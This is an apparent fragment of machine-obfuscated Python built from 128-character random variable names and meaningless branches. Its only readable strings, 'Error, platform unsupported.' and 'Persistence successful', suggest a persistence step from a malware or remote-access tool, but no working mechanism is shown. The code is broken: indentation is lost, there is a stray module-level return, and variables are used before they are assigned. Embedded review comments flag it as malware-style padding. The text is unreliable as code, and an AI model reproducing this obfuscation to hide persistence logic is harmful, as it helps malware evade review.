jefaaudXKuPuRwuLgckBDShgmGdGKNtMOZhsxVYOupuUpGNQhfHrVKnJQHTdkOQmaAYpHxGDHhHvtBQTPuGLfUQWXYCYKfEkAgNVObCwoEPnkrxsseCaaNbuYETQWnKB = 'rKNaNqkicivvfAArFubkRjXcJEAOgIjgdmHqbwJIPkCGpLCRQsNjNVzwhqcseJjjfsnuNRmiSiqBFnZZCNoOuvICtdDlmwbgGnqDIAwyPjpbQnXEHLQTUFVtKWBhksQV'
if uiXMSqOwzwpMXWiUhBOXwzZErQUCZRtWFHIPBYkgGLBSeCDarApaHBsGqYYJDJEqXBNLcXbqfLBWxtGBnfweZgESlMpmdbWdtjLAfvrTZBOgZGjscMAHiXKqHlTBuGaU != jefaaudXKuPuRwuLgckBDShgmGdGKNtMOZhsxVYOupuUpGNQhfHrVKnJQHTdkOQmaAYpHxGDHhHvtBQTPuGLfUQWXYCYKfEkAgNVObCwoEPnkrxsseCaaNbuYETQWnKB:
GjiRApQzOEaMZZkaRRMbHNoveNJtgQKTNVYHvyinpvqTgRhIyGbudebXPNEJbNMqimIajjCjjPbFsYtrarkPqKNwyiUIwMQNYsCpPzomtrurMcUNiRuROfYGrPfAyJBv = 'kqHvmQCVfDuyUwbLdliFYLCJvfPijbpRAARstMiOMaTLtzrASGWWSELZGvccpcbrfJShBEfdFytIrogTaRSkipAjwCxjYgTMsGzoqXhibZEpVkRgWYdBzeXgBfcYPtNa'
UOMCYaGEGHljpEMZsIRGcOOGmFYfDYlhWdEmthpndnRPzomUQnkwXxsWUTyNsAEeDvtMdGrvRlndtiZRxvMAitVIVqCthaspdlnLOEgAYXjEdMJzEMgqehsOBQigJKQU = 'YOAmdvwnOGsSqxpSJVCpLXDYCYHdYePAMmbLdzbAdpEtyFOZUiabibzUMLzXbcmzeahEVJcSqMfXwJoAcyhazofXVhBsuAayXBRTJyZZKkKCtOCETsLqyEDhUcUyJwUp'
UOMCYaGEGHljpEMZsIRGcOOGmFYfDYlhWdEmthpndnRPzomUQnkwXxsWUTyNsAEeDvtMdGrvRlndtiZRxvMAitVIVqCthaspdlnLOEgAYXjEdMJzEMgqehsOBQigJKQU = GjiRApQzOEaMZZkaRRMbHNoveNJtgQKTNVYHvyinpvqTgRhIyGbudebXPNEJbNMqimIajjCjjPbFsYtrarkPqKNwyiUIwMQNYsCpPzomtrurMcUNiRuROfYGrPfAyJBv
success, NmOtigRiHNqlJxVKDFTueXpfkXtrEaaUPWrloCdgxZSgFXKAkpwqEFZKhEisDwmOGhdbMqLBpwklXthMNHQCagqkJqLMhZRMWPtxhotCnCmKtNHKdctvtiloraUvKeOW = mYdssxnsmlAfvrSjolIFLdNSWdICTyEYmQJbnrImdVXGTLxpgMTBCjxQsBPIPCwxgCZxnmFTFjwtxPqutRQqsngShUqEoaiDLTvGJtxHpdekdgRxYrThxYRXvvNUnaav()
LrWSsxLkFmRwxEuOriDRltONcXxJKdIpIesQyWKbKiECqYyCamnpqGAgvCeQnzrpDewbzkAxBJjWPhPdQudWMVSCqRHTCJvMZOIWOHKpHSsfcYOXHzhTwpSUCayXAqLX = 'mdIRMgjFGfxwXWkEEFIAFXpQLnMwNYHdZnrEFEDKhAseQfPMgyGmeqPIsfxHiMpAKdVreRICCygZoAYmearnIbSGxjAVRSQkyMcegQpvqPRbLNfZfpGaOcVdXHDpdLNT'
WxThgpZdrUxxOFPuORtfvhRrEyRGMKILWjVXlQGLEdLkkSLYfwgRIKHvYdNVZTyRFulSIJStMXdiNzOKpEidPTvEgXDZXCPopuObnGNNRVuPLkXdtstDUXUXKnldZynv = 'XBztUoSjSHQaSlNCwVJVlMPguJgoOPPbmjKGcCzUApqXFPGnqmURLgRBkImCszHOtMrhXhholtPAfASjDhqNWrHTPjBLPOfvwhRIWedfUfymLZxvsPZfjbtIpkaXmEME'
JYBIDEQmFBzfyexocCozUJRtslCDopFKRTzEENEKjrugsLeARuJgbJUVDTvQVgFOwjtWUCbbqkIRLLNeYmDcjCClMiQNlTVxSGVZLsvEOeILmMtxYKqEEUuZwehbJMGE = 'mAWokzAJVQqNRfeqRafwhGSqfdzpVxEHUHtZnjGkeiCsnZLzARpuczRVwHJCSrYkJTBeYAViBkpcSRVUjmjfQICSPZiTKzknKCocrHfaZyJstbgGlhsVxvKWAqzEdUdh'
if LrWSsxLkFmRwxEuOriDRltONcXxJKdIpIesQyWKbKiECqYyCamnpqGAgvCeQnzrpDewbzkAxBJjWPhPdQudWMVSCqRHTCJvMZOIWOHKpHSsfcYOXHzhTwpSUCayXAqLX == WxThgpZdrUxxOFPuORtfvhRrEyRGMKILWjVXlQGLEdLkkSLYfwgRIKHvYdNVZTyRFulSIJStMXdiNzOKpEidPTvEgXDZXCPopuObnGNNRVuPLkXdtstDUXUXKnldZynv:
MXEwKSEWzbPUYQNYjgGyIzLHsBrtUYlHBjGXLKzRZiLrcNDvJpXQZsfFTWROvbrXzfWZWfSnZOcMIQVFmlJWfuUETNsMKFDGrxMJwAgPdyptaMrAHvOHjBvRwhjugjXM = 'jpxXkJeVedZYDJmZebgzHUnyPxVhXfWTbaeeduHNjWCqgEGZChIjgffeZKDvNKFvkggvfefGOQAYNBAAsvsvSwXNOoOXflwgRMRXjpyZLvZBBFAzMmzULqitQacugTIM'
MXEwKSEWzbPUYQNYjgGyIzLHsBrtUYlHBjGXLKzRZiLrcNDvJpXQZsfFTWROvbrXzfWZWfSnZOcMIQVFmlJWfuUETNsMKFDGrxMJwAgPdyptaMrAHvOHjBvRwhjugjXM = LrWSsxLkFmRwxEuOriDRltONcXxJKdIpIesQyWKbKiECqYyCamnpqGAgvCeQnzrpDewbzkAxBJjWPhPdQudWMVSCqRHTCJvMZOIWOHKpHSsfcYOXHzhTwpSUCayXAqLX
else:
MXEwKSEWzbPUYQNYjgGyIzLHsBrtUYlHBjGXLKzRZiLrcNDvJpXQZsfFTWROvbrXzfWZWfSnZOcMIQVFmlJWfuUETNsMKFDGrxMJwAgPdyptaMrAHvOHjBvRwhjugjXM = 'jpxXkJeVedZYDJmZebgzHUnyPxVhXfWTbaeeduHNjWCqgEGZChIjgffeZKDvNKFvkggvfefGOQAYNBAAsvsvSwXNOoOXflwgRMRXjpyZLvZBBFAzMmzULqitQacugTIM'
MXEwKSEWzbPUYQNYjgGyIzLHsBrtUYlHBjGXLKzRZiLrcNDvJpXQZsfFTWROvbrXzfWZWfSnZOcMIQVFmlJWfuUETNsMKFDGrxMJwAgPdyptaMrAHvOHjBvRwhjugjXM = JYBIDEQmFBzfyexocCozUJRtslCDopFKRTzEENEKjrugsLeARuJgbJUVDTvQVgFOwjtWUCbbqkIRLLNeYmDcjCClMiQNlTVxSGVZLsvEOeILmMtxYKqEEUuZwehbJMGE
else:
zSgZpRzhmlDVLwkjfXCeAeCzzJMdydPrBHgTwIvxmHlvCKGHkEGsqRcADgayEpRmGrjtXoPXTXHAQZoIvkjurcoQaYXmgULEoBCcpJPNXVbHiMjAniczSFCPeqIGjFXY = 'mAJTzGqMDGVwJkHzBYRNEKFDkarNoGroWhrGVzRXwsbqzSKyBLXrQiCeKJxMJoIlFHNufYCEpgrAiWHCJMhmGBRatGBLqEAsfdEQzhycnZReTBKxgSYcDtGqrifYeSRP'
TnFfiTItSjNcAAJttdaBBHUpVQEynmMWaISKLniSIReFqunjYhkNtInMvBhqfxAkTtYeEGyWyMGqbprhyxJTVAckDqBbIvBNogjilUyvLlARUxogBqCQXoYRDyhnMuma = 'PiiisAnWHIJbZqABWSrKRGoFSJFhGHzAOglOAtomTTzJcfzNQYWViYOhCwxgCsyTXYbyGbmQqaCfizNuOLvuJgxJwDQOpFgJlgFYmnNHqEJYBjFfUygJZLZMFMVShyuD'
roSxUnVSyWLaFrvAuuMbtzabPUyunReeToDefXGxyEehLxIWyiYmlaGQNfTyVwfJePzgCSOIeXqvrLjbuAsAPnOlSiZzJKWqJuWedzaIuXeiFSdRvveoYNBZinLwFovl = 'DySZCCTJSYdOCsnJbBjInaqWPvVJlmgupTjxdwrHeDgcUwpFtHnixIVjTEKwgIaTwNERawxczbMInlssVvBqEvSpqrDcUPowfavgKQtVyTSgkgtjSUxapFHRxWbgGIHL'
vNWOCqhQuuoJLQraazflUbCmiFQQjODDMGIMePZDqrkcjbIahiBdLlTNOgqYFwXSVQiakFflXbvxcSKZEMrruOiMkaAiBWUlborWFVmTWLaknFEkyIHrQnXduzVGMcZU = 'oHDEjizoeesBbCyaFsSHMqbwBpUApQktOWRxCpRpQyMqgzuwbSArqfXpJgscfiaWOHcKIMMoToUMlWQCTVpPhVhmMECZcjVLYRKyKnFleVnKEgvJdoemVCeSeFfCYZJQ'
wYMqPWrLXYTZyTrDHMiDPcTZuGUMEGfdiEkZZRDVdjLdpeuXZcgQZggyhITspZXMtDsKDUXbGGoMiRtKGIYeNIFgzwFNgsdCCQvxJADJzsFQGOuwjdTFNbbdkrwXikuR = 'FlbUBUNzJVrugoQVfHCQAvwiSrcCVYqQAECLPXBbWGJskKddwbulovgPMRjfgdMmuwmmHkunwmMBKjpucXvwMIXNYUyFWYazdAbBBmKJhZkfLNRqQUXMaMsXvzGbUwJo'
zDBCXZzCeYTzjoGcVXgoFxZCYtajDjipDsBAqlxEDgHZLfVxzGqODNYdYGvrznsQjJRWdQoDwzGMCluTTssjijymfbmkRlPHYwXMYSWcgpJPmKtmdhKWCESbiuwICUqG = 'nChgyQreCKFDtjmQRPUqTuSaCLgVtGPSXOgPMgvrENqETZisupJtsdzrrXtpzYIZSgVGVdeTXyGsnaEhphjDNcXyJfnbxlsGeqpXhhaNCcDjpfNHXqumGCnGwoVoBNii'
if zSgZpRzhmlDVLwkjfXCeAeCzzJMdydPrBHgTwIvxmHlvCKGHkEGsqRcADgayEpRmGrjtXoPXTXHAQZoIvkjurcoQaYXmgULEoBCcpJPNXVbHiMjAniczSFCPeqIGjFXY != vNWOCqhQuuoJLQraazflUbCmiFQQjODDMGIMePZDqrkcjbIahiBdLlTNOgqYFwXSVQiakFflXbvxcSKZEMrruOiMkaAiBWUlborWFVmTWLaknFEkyIHrQnXduzVGMcZU:
TnFfiTItSjNcAAJttdaBBHUpVQEynmMWaISKLniSIReFqunjYhkNtInMvBhqfxAkTtYeEGyWyMGqbprhyxJTVAckDqBbIvBNogjilUyvLlARUxogBqCQXoYRDyhnMuma = roSxUnVSyWLaFrvAuuMbtzabPUyunReeToDefXGxyEehLxIWyiYmlaGQNfTyVwfJePzgCSOIeXqvrLjbuAsAPnOlSiZzJKWqJuWedzaIuXeiFSdRvveoYNBZinLwFovl
for zDBCXZzCeYTzjoGcVXgoFxZCYtajDjipDsBAqlxEDgHZLfVxzGqODNYdYGvrznsQjJRWdQoDwzGMCluTTssjijymfbmkRlPHYwXMYSWcgpJPmKtmdhKWCESbiuwICUqG in vNWOCqhQuuoJLQraazflUbCmiFQQjODDMGIMePZDqrkcjbIahiBdLlTNOgqYFwXSVQiakFflXbvxcSKZEMrruOiMkaAiBWUlborWFVmTWLaknFEkyIHrQnXduzVGMcZU:
if zDBCXZzCeYTzjoGcVXgoFxZCYtajDjipDsBAqlxEDgHZLfVxzGqODNYdYGvrznsQjJRWdQoDwzGMCluTTssjijymfbmkRlPHYwXMYSWcgpJPmKtmdhKWCESbiuwICUqG != roSxUnVSyWLaFrvAuuMbtzabPUyunReeToDefXGxyEehLxIWyiYmlaGQNfTyVwfJePzgCSOIeXqvrLjbuAsAPnOlSiZzJKWqJuWedzaIuXeiFSdRvveoYNBZinLwFovl:
TnFfiTItSjNcAAJttdaBBHUpVQEynmMWaISKLniSIReFqunjYhkNtInMvBhqfxAkTtYeEGyWyMGqbprhyxJTVAckDqBbIvBNogjilUyvLlARUxogBqCQXoYRDyhnMuma = TnFfiTItSjNcAAJttdaBBHUpVQEynmMWaISKLniSIReFqunjYhkNtInMvBhqfxAkTtYeEGyWyMGqbprhyxJTVAckDqBbIvBNogjilUyvLlARUxogBqCQXoYRDyhnMuma
else:
wYMqPWrLXYTZyTrDHMiDPcTZuGUMEGfdiEkZZRDVdjLdpeuXZcgQZggyhITspZXMtDsKDUXbGGoMiRtKGIYeNIFgzwFNgsdCCQvxJADJzsFQGOuwjdTFNbbdkrwXikuR = zSgZpRzhmlDVLwkjfXCeAeCzzJMdydPrBHgTwIvxmHlvCKGHkEGsqRcADgayEpRmGrjtXoPXTXHAQZoIvkjurcoQaYXmgULEoBCcpJPNXVbHiMjAniczSFCPeqIGjFXY
else:
roSxUnVSyWLaFrvAuuMbtzabPUyunReeToDefXGxyEehLxIWyiYmlaGQNfTyVwfJePzgCSOIeXqvrLjbuAsAPnOlSiZzJKWqJuWedzaIuXeiFSdRvveoYNBZinLwFovl = zSgZpRzhmlDVLwkjfXCeAeCzzJMdydPrBHgTwIvxmHlvCKGHkEGsqRcADgayEpRmGrjtXoPXTXHAQZoIvkjurcoQaYXmgULEoBCcpJPNXVbHiMjAniczSFCPeqIGjFXY
zSgZpRzhmlDVLwkjfXCeAeCzzJMdydPrBHgTwIvxmHlvCKGHkEGsqRcADgayEpRmGrjtXoPXTXHAQZoIvkjurcoQaYXmgULEoBCcpJPNXVbHiMjAniczSFCPeqIGjFXY = wYMqPWrLXYTZyTrDHMiDPcTZuGUMEGfdiEkZZRDVdjLdpeuXZcgQZggyhITspZXMtDsKDUXbGGoMiRtKGIYeNIFgzwFNgsdCCQvxJADJzsFQGOuwjdTFNbbdkrwXikuR
if roSxUnVSyWLaFrvAuuMbtzabPUyunReeToDefXGxyEehLxIWyiYmlaGQNfTyVwfJePzgCSOIeXqvrLjbuAsAPnOlSiZzJKWqJuWedzaIuXeiFSdRvveoYNBZinLwFovl == zSgZpRzhmlDVLwkjfXCeAeCzzJMdydPrBHgTwIvxmHlvCKGHkEGsqRcADgayEpRmGrjtXoPXTXHAQZoIvkjurcoQaYXmgULEoBCcpJPNXVbHiMjAniczSFCPeqIGjFXY:
for zDBCXZzCeYTzjoGcVXgoFxZCYtajDjipDsBAqlxEDgHZLfVxzGqODNYdYGvrznsQjJRWdQoDwzGMCluTTssjijymfbmkRlPHYwXMYSWcgpJPmKtmdhKWCESbiuwICUqG in zSgZpRzhmlDVLwkjfXCeAeCzzJMdydPrBHgTwIvxmHlvCKGHkEGsqRcADgayEpRmGrjtXoPXTXHAQZoIvkjurcoQaYXmgULEoBCcpJPNXVbHiMjAniczSFCPeqIGjFXY:
if zDBCXZzCeYTzjoGcVXgoFxZCYtajDjipDsBAqlxEDgHZLfVxzGqODNYdYGvrznsQjJRWdQoDwzGMCluTTssjijymfbmkRlPHYwXMYSWcgpJPmKtmdhKWCESbiuwICUqG == roSxUnVSyWLaFrvAuuMbtzabPUyunReeToDefXGxyEehLxIWyiYmlaGQNfTyVwfJePzgCSOIeXqvrLjbuAsAPnOlSiZzJKWqJuWedzaIuXeiFSdRvveoYNBZinLwFovl:
roSxUnVSyWLaFrvAuuMbtzabPUyunReeToDefXGxyEehLxIWyiYmlaGQNfTyVwfJePzgCSOIeXqvrLjbuAsAPnOlSiZzJKWqJuWedzaIuXeiFSdRvveoYNBZinLwFovl = zSgZpRzhmlDVLwkjfXCeAeCzzJMdydPrBHgTwIvxmHlvCKGHkEGsqRcADgayEpRmGrjtXoPXTXHAQZoIvkjurcoQaYXmgULEoBCcpJPNXVbHiMjAniczSFCPeqIGjFXY
else:
roSxUnVSyWLaFrvAuuMbtzabPUyunReeToDefXGxyEehLxIWyiYmlaGQNfTyVwfJePzgCSOIeXqvrLjbuAsAPnOlSiZzJKWqJuWedzaIuXeiFSdRvveoYNBZinLwFovl = wYMqPWrLXYTZyTrDHMiDPcTZuGUMEGfdiEkZZRDVdjLdpeuXZcgQZggyhITspZXMtDsKDUXbGGoMiRtKGIYeNIFgzwFNgsdCCQvxJADJzsFQGOuwjdTFNbbdkrwXikuR
return 'Error, platform unsupported.'
if success:
GANiLWIgAKbahvnCcbxjpPzKTCdeLkPbZOVmErymYmEjzlGIBMnaebQfVNMcKUvglkWKIgpyzpRPPWhdWzLHPsvcbpoXCGdAPbrccRORVDlenstZaubSWcFfbvVWDHBi = 'KHTCIYVKuzPyydIkKMvQqDyUueqnfvkqVdaEoiheUXlabjAnvPqwHvsESJaNmEbsgkzIpGczqElbONKZBcBwAULEosAvYndXcbtsgGCLfbPtMnCXxJgKIHORsGKojryd'
qIQaNWZymJHEJRjVYnqikuowQoITnoyCDlsiDQsImRZvYCXdkngtmtveciFFmPFIoZVmEwPqeNDTWoKSfahOmZsDkxDCuzniKNWMqAsiOHxjMAinCeBuLJwtteFeVlWP = 'vOSKLrKnpiVmGKHbbuHBUMnGqxenbtgtHHhmeUHCgaqKITlwIhvjFPxnAcminmJMKCSYqyrMoJpgZdbacPupUPHFUizGeEKrxHKJyUHKBpfBJWDKQQDQLnyzfEDrPJph'
usOEixIjQPrMfLcGMUThglTUuysqywVYcsyIePcUqvSGuPfFMgiIxUBWiriwfxzzEiNgrdrPYadvyEotHjxeMOsjeAMsbzJMVamQGXKaYfWFXneRnEIAkgFDBjioBMKY = 'uVvPtjqPOcNOlYJLoZXAJqldddGvGLLBVlaEXjoIbWilAgfiNeZtahFShbctcaxvxwCYWweyhtSOSsTfULKnNVvjWCqvnwtJcQvnlFrkwULXyolKyhdVDZESjRMWmEWB'
if GANiLWIgAKbahvnCcbxjpPzKTCdeLkPbZOVmErymYmEjzlGIBMnaebQfVNMcKUvglkWKIgpyzpRPPWhdWzLHPsvcbpoXCGdAPbrccRORVDlenstZaubSWcFfbvVWDHBi == qIQaNWZymJHEJRjVYnqikuowQoITnoyCDlsiDQsImRZvYCXdkngtmtveciFFmPFIoZVmEwPqeNDTWoKSfahOmZsDkxDCuzniKNWMqAsiOHxjMAinCeBuLJwtteFeVlWP:
NJddpzJOkofHlpHfgDbHUygjLPzklhDptakOqQrxAGGBUnrgSBpdCACfvjhQFdyolXqHPTakBMrZMVfADDeKLXhqXZZsYLHUuqtrgnNyZQPlWWjIDdVVXGOLmWLMXzLI = 'tIMGnOwSnhlRUayrmrKdXaHOPryPRefnmFKYUqSQMzMGTNQvWDHEMxmHJndWRZiNxSbKtfGBIeSjRnDiNxPKZOsJpNLDpsZUxcFAvhRnrFeLoIoybeArNUXGmEZMiPEU'
NJddpzJOkofHlpHfgDbHUygjLPzklhDptakOqQrxAGGBUnrgSBpdCACfvjhQFdyolXqHPTakBMrZMVfADDeKLXhqXZZsYLHUuqtrgnNyZQPlWWjIDdVVXGOLmWLMXzLI = GANiLWIgAKbahvnCcbxjpPzKTCdeLkPbZOVmErymYmEjzlGIBMnaebQfVNMcKUvglkWKIgpyzpRPPWhdWzLHPsvcbpoXCGdAPbrccRORVDlenstZaubSWcFfbvVWDHBi
else:
NJddpzJOkofHlpHfgDbHUygjLPzklhDptakOqQrxAGGBUnrgSBpdCACfvjhQFdyolXqHPTakBMrZMVfADDeKLXhqXZZsYLHUuqtrgnNyZQPlWWjIDdVVXGOLmWLMXzLI = 'tIMGnOwSnhlRUayrmrKdXaHOPryPRefnmFKYUqSQMzMGTNQvWDHEMxmHJndWRZiNxSbKtfGBIeSjRnDiNxPKZOsJpNLDpsZUxcFAvhRnrFeLoIoybeArNUXGmEZMiPEU'
NJddpzJOkofHlpHfgDbHUygjLPzklhDptakOqQrxAGGBUnrgSBpdCACfvjhQFdyolXqHPTakBMrZMVfADDeKLXhqXZZsYLHUuqtrgnNyZQPlWWjIDdVVXGOLmWLMXzLI = usOEixIjQPrMfLcGMUThglTUuysqywVYcsyIePcUqvSGuPfFMgiIxUBWiriwfxzzEiNgrdrPYadvyEotHjxeMOsjeAMsbzJMVamQGXKaYfWFXneRnEIAkgFDBjioBMKY
AETOfEpJAcGWxlOcQYzGJpiWEadsCqMJeAyQZmWyZavtpjNbltXidcwnJHhIacuqAZywOvKBUcfaKeHHuSkHRWiyTuysieVFxDfLIlIHfzVRPYEvqrucbKHLwfjPVjDc = 'Persistence successful, {}.'.format(NmOtigRiHNqlJxVKDFTueXpfkXtrEaaUPWrloCdgxZSgFXKAkpwqEFZKhEisDwmOGhdbMqLBpwklXthMNHQCagqkJqLMhZRMWPtxhotCnCmKtNHKdctvtiloraUvKeOW)
EmktykGKiJDpmMKGKPmFaKVhGGCIJinheKzmhvMieMYkTMYAuSOtkmjZndIdotfcOjlKTlSYcbrwEEkWHvcjQQNwhscFLJNhqvzKuBfqrkwXVwNRVSQgIArKDQnYLPsI = 'BWVXBmiuvumpBXcMjgwHLwjmleUWBysfLKGEQpOJoEJSPcXeBWZoqScAybnCzhuxOgGZoeWUbcSUbSuGOYIdswBTfFsXSCkwdnuzTcwasWkvwJIVHNMLmlJdTKHadxWN'
kfwZzqVjvWtZuKVVCZjJAKYQzLkMPkDQZLFuDKHgvdQSLtWyYAmiGGHHcHbPymJGWwbSdffPVXBaAnGmYGKFSyOnQYQxjfVkoIXTPevsTDPOFZNEmnpCkTtwqLsCOBrF = 'pkKyPlpekozQuOKulXJRdfOItWEvycnJAAaWiHGIZkMLYPGUZDgqUxlYuPDtPKIgLEwYRkxsylKIQCchLXxXGSFHoyviNXBeUaNyUMisoPghLtcTWXFIQRHiPrnhYmta'
yPoJLkodDhsKpHohHedCnwwnOJlVgSIWrJINhvudbScYUoOvcylcTSKOUVxuWUXosJAOvNvhANQWsiBVFLsXGauUMKvhMyctBqRZnzEjOfONfXPQUhZKnsoLDGaNVnhK = 'bTKyqvllcDsohtjePFBEaxesmIsZximHopeyYRNgnsdvrIYwQoDwAcdSRGXyTQQZQMQzZkwxuQqtMpaZaBgwnaBEnawrLeCXOMHClqoscNlBVfmkRgbbuSVyNNgtEGlm'
if EmktykGKiJDpmMKGKPmFaKVhGGCIJinheKzmhvMieMYkTMYAuSOtkmjZndIdotfcOjlKTlSYcbrwEEkWHvcjQQNwhscFLJNhqvzKuBfqrkwXVwNRVSQgIArKDQnYLPsI == kfwZzqVjvWtZuKVVCZjJAKYQzLkMPkDQZLFuDKHgvdQSLtWyYAmiGGHHcHbPymJGWwbSdffPVXBaAnGmYGKFSyOnQYQxjfVkoIXTPevsTDPOFZNEmnpCkTtwqLsCOBrF:
TdrSYuaHBBJJUpksaPrmRzcHhDdcZJnQLiyVJZAeHVTcNumjlaqdDTiilKSpsotwglqtHZHWmNanFXycmBIwUSsfeYtqBMtiWinfSHnrXYncuWuQSGQVUNIQYSsoJUsv = 'bqXeruVKqkVhdrJqMJycIovYFRYTcKBzidBIDYwOUFQvLpbNzlgKaRNNfsKrnjDINdRJaDfYBzhhKSnxFlxEroTvmgEXfijoYIbxbCTJiFeniBvkrYpXNbARHvqsqbrc'
TdrSYuaHBBJJUpksaPrmRzcHhDdcZJnQLiyVJZAeHVTcNumjlaqdDTiilKSpsotwglqtHZHWmNanFXycmBIwUSsfeYtqBMtiWinfSHnrXYncuWuQSGQVUNIQYSsoJUsv = EmktykGKiJDpmMKGKPmFaKVhGGCIJinheKzmhvMieMYkTMYAuSOtkmjZndIdotfcOjlKTlSYcbrwEEkWHvcjQQNwhscFLJNhqvzKuBfqrkwXVwNRVSQgIArKDQnYLPsI
else:
TdrSYuaHBBJJUpksaPrmRzcHhDdcZJnQLiyVJZAeHVTcNumjlaqdDTiilKSpsotwglqtHZHWmNanFXycmBIwUSsfeYtqBMtiWinfSHnrXYncuWuQSGQVUNIQYSsoJUsv = 'bqXeruVKqkVhdrJqMJycIovYFRYTcKBzidBIDYwOUFQvLpbNzlgKaRNNfsKrnjDINdRJaDfYBzhhKSnxFlxEroTvmgEXfijoYIbxbCTJiFeniBvkrYpXNbARHvqsqbrc'
TdrSYuaHBBJJUpksaPrmRzcHhDdcZJnQLiyVJZAeHVTcNumjlaqdDTiilKSpsotwglqtHZHWmNanFXycmBIwUSsfeYtqBMtiWinfSHnrXYncuWuQSGQVUNIQYSsoJUsv = yPoJLkodDhsKpHohHedCnwwnOJlVgSIWrJINhvudbScYUoOvcylcTSKOUVxuWUXosJAOvNvhANQWsiBVFLsXGauUMKvhMyctBqRZnzEjOfONfXPQUhZKnsoLDGaNVnhK
else:
PLBcCyJepseMCiMLskeXXaEaPxrSiAQBDABBwpbwjPmEQBXfyftSRonDgubqKLvMdtqUIEsyLbXCoDwfeHrEUwCAtaVmQFmaVByQIslHNmMXpbVXGcZkGHcvgBDYREHx = 'YIeomnqfouukglQulxwCQRuVUGGWjRrTaxPeJKmlvoyfYqNiilugIsZMdzTnmAFzWbNBsndaPlAVhKqFrwODsGelztRjsOhcVlKCDAiOYkeSGXgydqWzZYVdFkaXbCdN'
AwyPxsvvAFQJSBzBPMbwBMdRpKizAljsdVrUyxPisyfdbHjXVgltSRuWyrpznRHgmSPFLAPcVPAqsjvkZLDsIrcnMEIXEmypXkygSQMdLMjtCeEqqtuXZPnEuofPkuFW = 'kBiMmJGPnLpMoXDFIgPmELFEyImIZfNyRdYraAvphheOQNUdvheHMOmNWWtqYNmfXVDJbJCxKnOpGXhaRKugbhzouSRkwYWZRcsDmZlGCVMmKZgzVMxFIaiOAjFyoSwx'
SFNnASNmEvBZsqyZPylHBJLhFBfSxnJxuGCxBCWvfcqlHpDWXMRrHKhCSVnKYsueJePHmAJymFumxwpdjPTOAQKxRBjGsTbXdeovKEbfVvktwaZdMiHUAvxRONeJOgIN = 'MAYPlUPQgMDIxHIrWosIVbRsCqCYojhEzLybDXhAUANAnpEMeKdWbypWiTnKGxtzBpNzhbuwcXKCAIfNIeBotPueQsqYrxRDCPGGcelSNUHLAgzkfkmvqZQkWPkXfUHS'
# NOTE(review): this entire block is machine-generated/obfuscated code with
# 128-character random identifiers. Several names are read before they are
# ever assigned (e.g. the name starting "SFNnASNm..." on the first branch and
# "NmOtigRiHN..." in the format() call below), and the block ends with a
# module-level `return`, which is a SyntaxError outside a function. It looks
# like dead filler or malware-style padding — confirm provenance and delete.
GxsglDorLSiNmmxsMwZbUoGbPQBaUgpuorSZsuZmxuiFJdvWDEItAArPwGgSbIVjMQTkyZSubHYGNpwOufTpvYOxyUxxVjiyDuUflILRIyZPzmxoCCcRUYCUFvIkUYbw = 'VDJKNNbAOCxEbArhAMmzlqvUTfVmqsJcnuyiGeMXYNmYOZMvsTCCJxnPLuQFNntDhkVIdNWKIItGVXntUhDlOtGHiBnqVeffSecUhtkcAnWwUbzFJOsozaFdQxEALgfa'
GXWdmJOGpTQvSCckhngBvAZOaZhjEuYwLgqWqcDnyaaiIPbECsmVjskaVHaxgFWSMFqxFeoZCVdWjJMmguYYmTATdnBvIBFyzeFNvqpUhGumznDPFImWlFMTqJzCLWpb = 'IddWmEvmfmILKtaZQKLMgdYaQvDlLHAjzgvqIPhRQzruDIvSsgDCakLgXrJHVSoklYvLgHaxEGcNFCzRXVfVKfwVIJBLXuOzSpedezkHtBFqaPTquZordtZwzkvGWfzC'
uNzZJovYyVzEbBUoiltANpEBQHQVBdjEFgcImZLEXqVrtxYLxJFSBvdzlbLOXWjNLzkABujygIQEDvulEntlashizksXGKbgosRMFPcmzTZrlqTbCjxZWLiJnoOnsAEj = 'WKpDRWbHCudbUSlVaLTflrbltxrWElpxEiSZSqgiSqAhbTcmirsYEfcrfoOlTFMiQbAtlokfdiKijjbPLQsmnTDuFBYEMEnrYDAxzLnPWfplKMXdFsjdmTreDnSLVfLK'
# NOTE(review): the comparisons and assignments below shuffle the same
# variables around without any observable effect — apparent dead code.
if PLBcCyJepseMCiMLskeXXaEaPxrSiAQBDABBwpbwjPmEQBXfyftSRonDgubqKLvMdtqUIEsyLbXCoDwfeHrEUwCAtaVmQFmaVByQIslHNmMXpbVXGcZkGHcvgBDYREHx != GxsglDorLSiNmmxsMwZbUoGbPQBaUgpuorSZsuZmxuiFJdvWDEItAArPwGgSbIVjMQTkyZSubHYGNpwOufTpvYOxyUxxVjiyDuUflILRIyZPzmxoCCcRUYCUFvIkUYbw:
    AwyPxsvvAFQJSBzBPMbwBMdRpKizAljsdVrUyxPisyfdbHjXVgltSRuWyrpznRHgmSPFLAPcVPAqsjvkZLDsIrcnMEIXEmypXkygSQMdLMjtCeEqqtuXZPnEuofPkuFW = SFNnASNmEvBZsqyZPylHBJLhFBfSxnJxuGCxBCWvfcqlHpDWXMRrHKhCSVnKYsueJePHmAJymFumxwpdjPTOAQKxRBjGsTbXdeovKEbfVvktwaZdMiHUAvxRONeJOgIN
    for uNzZJovYyVzEbBUoiltANpEBQHQVBdjEFgcImZLEXqVrtxYLxJFSBvdzlbLOXWjNLzkABujygIQEDvulEntlashizksXGKbgosRMFPcmzTZrlqTbCjxZWLiJnoOnsAEj in GxsglDorLSiNmmxsMwZbUoGbPQBaUgpuorSZsuZmxuiFJdvWDEItAArPwGgSbIVjMQTkyZSubHYGNpwOufTpvYOxyUxxVjiyDuUflILRIyZPzmxoCCcRUYCUFvIkUYbw:
        if uNzZJovYyVzEbBUoiltANpEBQHQVBdjEFgcImZLEXqVrtxYLxJFSBvdzlbLOXWjNLzkABujygIQEDvulEntlashizksXGKbgosRMFPcmzTZrlqTbCjxZWLiJnoOnsAEj != SFNnASNmEvBZsqyZPylHBJLhFBfSxnJxuGCxBCWvfcqlHpDWXMRrHKhCSVnKYsueJePHmAJymFumxwpdjPTOAQKxRBjGsTbXdeovKEbfVvktwaZdMiHUAvxRONeJOgIN:
            AwyPxsvvAFQJSBzBPMbwBMdRpKizAljsdVrUyxPisyfdbHjXVgltSRuWyrpznRHgmSPFLAPcVPAqsjvkZLDsIrcnMEIXEmypXkygSQMdLMjtCeEqqtuXZPnEuofPkuFW = AwyPxsvvAFQJSBzBPMbwBMdRpKizAljsdVrUyxPisyfdbHjXVgltSRuWyrpznRHgmSPFLAPcVPAqsjvkZLDsIrcnMEIXEmypXkygSQMdLMjtCeEqqtuXZPnEuofPkuFW
        else:
